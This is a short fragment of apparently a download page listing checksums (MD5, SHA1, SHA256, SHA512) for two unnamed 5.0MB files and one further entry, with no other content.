  SHA256: bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
  SHA512: 668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763

  Filesize: 5.0MB
  MD5: e222309197c5e633aa8e294ba4bdcd29
  SHA1: 52b3f89a3d2262bf603628093f6d1e71d9cc3820
  SHA256: 047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
  SHA512: 9eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503

  Filesize: 5.0MB
  MD5: cbfb164ae053ade07f3f4a8425de768c
  SHA1: aaae0db43456b87ade37ca98acf4a8143bd9592e
  SHA256: 63d7430866a73f9d6a8880a8b81428c386b15d467714f1f71d15748118bb67b5
  SHA512: e91e5450907464a65a4e7fb068550d4435224291cd483fb9001833dfb916e926e10ec2fb56e899c8aa75b20672aac109f7a03daa135b8105e94d0ce48a8faea0